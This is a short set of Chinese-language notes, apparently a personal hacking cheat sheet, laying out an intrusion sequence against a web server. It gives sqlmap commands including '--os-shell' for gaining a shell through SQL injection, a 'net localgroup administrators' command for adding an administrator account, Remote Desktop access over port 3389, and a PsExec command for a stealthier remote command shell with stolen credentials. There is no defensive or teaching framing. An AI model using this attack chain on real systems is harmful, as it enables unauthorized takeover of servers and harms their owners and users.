1.find漏洞的URL
2.SQLmap注入相关细节
sqlmap.py -u "URL"
sqlmap.py -u "URL" --os-shell (拿到系统web服务器的权限)
3.黑客常用命令
net localgroup administrators 用户名 /add
4.远程桌面控制需要打开3389号端口 netstat //mstsc (Microsoft terminal services client)命令行
开始远程桌面控制,能拿到c盘的控制权,达到更改系统c盘文件的功能。
5.更加隐蔽的工具 微软 Psexec 省去手动开启 3389端口的命令
** Psexec \\IP -u 用户名 -p 密码 cmd